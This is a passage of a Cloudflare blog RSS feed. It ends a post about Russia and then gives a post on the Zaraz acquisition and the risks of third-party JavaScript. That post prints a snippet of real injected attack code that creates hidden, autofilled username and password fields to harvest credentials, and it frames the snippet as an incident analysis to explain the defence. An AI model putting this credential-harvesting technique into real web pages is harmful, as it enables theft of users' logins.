            </figure><p>We’ve also seen an increase in Russian blocking and throttling efforts, combined with Russian efforts to control the content of the media operating inside Russia with a new <a href="https://www.theverge.com/2022/3/4/22961472/russia-fake-news-law-military-ukraine-invasion-casualties-jail-time">“fake news” law.</a></p><p>The Russian government itself, over the last several years, has repeatedly threatened to block certain Cloudflare <a href="https://www.bleepingcomputer.com/news/legal/russian-internet-watchdog-announces-ban-of-six-more-vpn-products/">services</a> and customers. Indiscriminately terminating service would do little to harm the Russian government, but would both limit access to information outside the country and make significantly more vulnerable those who have used us to shield themselves as they have criticized the government.</p><p>In fact, we believe the Russian government would celebrate us shutting down Cloudflare's services in Russia. We absolutely appreciate the spirit of many Ukrainians making requests across the tech sector for companies to terminate services in Russia. However, when what Cloudflare is fundamentally providing is a more open, private, and secure Internet, we believe that shutting down Cloudflare's services entirely in Russia would be a mistake.</p><p>Our thoughts are with the people of Ukraine, and the entire team at Cloudflare prays for a peaceful resolution as soon as possible.</p> ]]></content:encoded>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Internet Traffic]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">3OsCwQ7RuA5Fq6cNP5D4Qn</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Why Cloudflare Bought Zaraz]]></title>
            <link>https://blog.cloudflare.com/why-cloudflare-bought-zaraz/</link>
            <pubDate>Wed, 08 Dec 2021 14:02:00 GMT</pubDate>
            <description><![CDATA[ Today we're excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare's mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. ]]></description>
            <content:encoded><![CDATA[ <p>Today we're excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare's mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. In other words, it was a no-brainer that we invite them to join our team.</p>
    <div>
      <h3>Be Careful Who Takes Out the Trash</h3>
      <a href="#be-careful-who-takes-out-the-trash">
        
      </a>
    </div>
    <p>To understand Zaraz's value proposition, you need to understand one of the biggest risks to most websites that people aren't paying enough attention to. And, to understand that, let me use an analogy.</p><p>Imagine you run a business. Imagine that business is, I don't know, a pharmacy. You have employees. They have a process and way they do things. They're under contract, and you conduct background checks before you hire them. They do their jobs well and you trust them. One day, however, you realize that no one is emptying the trash. So you ask your team to find someone to empty the trash regularly.</p><p>Your team is busy and no one has the time to add this to their regular duties. But one plucky employee has an idea. He goes out on the street and hails down a relative stranger. "Hey," your employee says to the stranger. "I've seen you walking by this way every day. Would you mind stopping in and taking out the trash when you do?"</p><p>"Uh", the stranger says. "Sure?!"</p><p>"Great," your employee says. "Here's a badge that will let you into the building. The trash is behind the secure area of the pharmacy, but, don't worry, just use the badge, and you can get back there. You look trustworthy. This will work out great!!"</p><p>And for a while it does. The stranger swings by every day. Takes out the trash. Behaves exactly as hoped. And no one thinks much about the trash again.</p><p>But one day you walk in, and the pharmacy has been robbed. Drugs stolen, patient records missing. Logs indicate that it was the stranger's badge that had been used to access the pharmacy. You track down the stranger, and he says, "Hey, that sucks, but it wasn't me. I handed off that trash responsibility to someone else long ago when I stopped walking past the pharmacy every day."</p><p>And you never track down the person who used the privileged access to violate your trust.</p>
    <div>
      <h3>The Keys to the Kingdom</h3>
      <a href="#the-keys-to-the-kingdom">
        
      </a>
    </div>
    <p>Now, of course, this is crazy. No one would go pick a random stranger off the street and give them access to their physical store. And yet, in the virtual world, a version of this happens all the time.</p><p>Every day, front end developers, marketers, and even security teams embed third-party scripts directly on their web pages. These scripts perform basic tasks — the metaphorical equivalent of taking out the trash. When performing correctly, they can be valuable at bringing advanced functionality to sites, helping track marketing conversions, providing analytics, or stopping fraud. But, if they ever go bad, they can cause significant problems and even steal data.</p><p>At the most mundane, poorly configured scripts can slow down the rendering pages. While there are ways to make scripts non-blocking, the unfortunate reality is that their developers don't always follow the best practices. Often when we see slow websites, the biggest cause of slowness is all the third-party scripts that have been embedded.</p><p>But it can be worse. Much worse. At Cloudflare, we've seen this first hand. Back in 2019 a hacker compromised a third-party service that Cloudflare used and modified the third-party JavaScript that was loaded into a page on cloudflare.com. Their aim was to steal login cookies, usernames and passwords. They went so far as to automatically create username and password fields that would autocomplete.</p><p>Here’s a snippet of the actual code injected:</p>
            <pre><code>        var cf_form = document.createElement("form");
        cf_form.style.display = "none";
        document.body.appendChild(cf_form);
        var cf_email = document.createElement("input");
        cf_email.setAttribute("type", "text");
        cf_email.setAttribute("name", "email");
        cf_email.setAttribute("autocomplete", "username");
        cf_email.setAttribute("id", "_email_");
        cf_email.style.display = "none";
        cf_form.appendChild(cf_email);
        var cf_password = document.createElement("input");
        cf_password.setAttribute("type", "password");
        cf_password.setAttribute("name", "password");
        cf_password.setAttribute("autocomplete", "current-password");
        cf_password.setAttribute("id", "_password_");
        cf_password.style.display = "none";
        cf_form.appendChild(cf_password);</code></pre>
            <p>Luckily, this attack caused minimal damage because it was caught very quickly by the team, but it highlights the very real danger of third-party JavaScript. Why should code designed to count clicks even be allowed to create a password field?</p><p>Put simply, third-party JavaScript is a security nightmare for the web. What looks like a simple one-line change (“just add this JavaScript to get free page view tracking!”) opens a door to malicious code that you simply don’t control.</p><p>Worse, third-party JavaScript can and does load other JavaScript from other unknown parties. Even if you trust the company whose code you’ve chosen to embed, you probably don’t trust (or even know about!) what they choose to include.</p><p>Worse still, these scripts can change at any time. Security threats can come and go. The attacker who went after Cloudflare compromised the third party and modified their service to only attack Cloudflare, and included anti-debugging features to try to stop developers spotting the hack. If you're a <a href="https://www.cloudflare.com/cio/">CIO</a> and this doesn't freak you out already, ask your web development team how many third-party scripts are on your websites. Do you trust them all?</p><p>At the most mundane, poorly configured scripts can slow down the rendering of pages. While there are ways to make scripts non-blocking, the unfortunate reality is that their developers don't always follow best practices. Often when we see slow websites, the biggest cause of slowness is all the third-party scripts that have been embedded.</p><p>The practice of adding third-party scripts to handle simple tasks is the literal equivalent of pulling a random stranger off the street, giving them physical access to your office, and asking them to stop by once a day to empty the trash. It's completely crazy in the physical world, and yet it's common practice in web development.</p>
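    <p>One standards-based guard against a script changing underneath you is Subresource Integrity: the integrity attribute pins a script tag to a hash of its known-good contents, and the browser refuses to execute anything that doesn't match. A sketch of computing the value with Node's crypto module (the script contents here are made up):</p>
            <pre><code>const crypto = require("crypto");

// An SRI value is "sha384-" followed by the base64 SHA-384 digest of the file.
function sriHash(scriptContents) {
  return "sha384-" + crypto.createHash("sha384").update(scriptContents).digest("base64");
}

const integrity = sriHash('console.log("page view tracked");');
// Used in HTML as: script src="https://third-party.example/track.js"
//                  integrity="sha384-..." crossorigin="anonymous"
console.log(integrity);</code></pre>
    <p>SRI only works for scripts that don't change, though; a vendor that legitimately ships updates every day breaks the pin, which is part of why a managed, policy-based approach is needed for dynamic third-party code.</p>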
    <div>
      <h3>Sandboxing the Strangers</h3>
      <a href="#sandboxing-the-strangers">
        
      </a>
    </div>
    <p>At Cloudflare, our solution was draconian. We ordered that all third-party scripts be stripped from our websites. Different teams at Cloudflare were concerned. Especially our marketing team, who used these scripts to assess whether the campaigns they were running were successful. But we made the decision that it was more important to protect the integrity of our service than to have visibility into things like marketing campaigns.</p><p>It was around this time that we met the team behind Zaraz. They argued there didn't need to be such a drastic choice. What if, instead, you could strictly control what the scripts you insert on your page could do? Make sure that if they were ever compromised, they wouldn't have access to anything they weren't authorized to see. Ensure that if they failed or were slow, they wouldn't keep a page from rendering.</p><p>We've spent the last half year testing Zaraz, and it's magical. It gives you the best of the flexible, extensible web while ensuring that CIOs and <a href="https://www.cloudflare.com/ciso/">CISOs</a> can sleep well at night knowing that even if a third-party script provider is compromised, it won't result in a security incident.</p><p>To put a fine point on it, had Cloudflare been running Zaraz then the threat from the compromised script we saw in 2019 would have been completely and automatically eliminated. There’s no way for the attacker to create those username and password fields, no access to cookies that are stored in the user’s browser. The attack surface would have been completely removed.</p><p>We've published two other posts today outlining how Zaraz works as well as examples of how companies are using it to ensure their web presence is secure, reliable, and fast. 
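</p><p>The core idea, an allowlist sitting between the page and the vendor, can be sketched in a few lines. Everything below is purely illustrative and not Zaraz's actual implementation:</p>
            <pre><code>// Events flow through a gatekeeper instead of the vendor's script running
// with full access to the page. Only named events and fields pass through.
const ALLOWED_EVENTS = new Set(["pageview", "click"]);
const ALLOWED_FIELDS = new Set(["path", "timestamp"]);

function sanitizeEvent(event) {
  if (!ALLOWED_EVENTS.has(event.name)) return null; // drop anything unexpected
  const payload = {};
  for (const key of Object.keys(event.payload || {})) {
    if (ALLOWED_FIELDS.has(key)) payload[key] = event.payload[key];
  }
  // Cookies, form fields, and credentials are simply never forwarded.
  return { name: event.name, payload };
}

// A compromised script fishing for credentials gets nothing through:
console.log(sanitizeEvent({ name: "pageview", payload: { path: "/", password: "hunter2" } }));</code></pre>
<p>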
We are making Zaraz available to our Enterprise customers immediately, and all other customers can access a free beta version on their <a href="https://dash.cloudflare.com/?to=/:account/:zone/zaraz">dashboard</a> starting today.</p><p>If you're a third-party script developer, be on notice that if you're not properly securing your scripts, then, as Zaraz rolls out across more of the web, your scripts will stop working. Today, Cloudflare sits in front of nearly 20% of all websites and, before long, we expect Zaraz's technology will help protect all of them. We want to make sure all scripts running on our customers' sites meet modern security, reliability, and performance standards. If you need help getting there, please reach out, and we’ll be standing ready to help: <a>zaraz@cloudflare.com</a>.</p><p>In the meantime, we encourage you to read about how the Zaraz technology works and how customers like Instacart are using it to build a better web presence.</p><p>It's terrific to have Zaraz on board, furthering Cloudflare's mission to help build a better Internet. Welcome to the team. And in that vein, we'd like to welcome you to Zaraz! We're excited for you to get your hands on this piece of technology that makes the web better.</p> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <guid isPermaLink="false">1O9xC0yLccgWJd7p6EJEtU</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
    </channel>
</rss>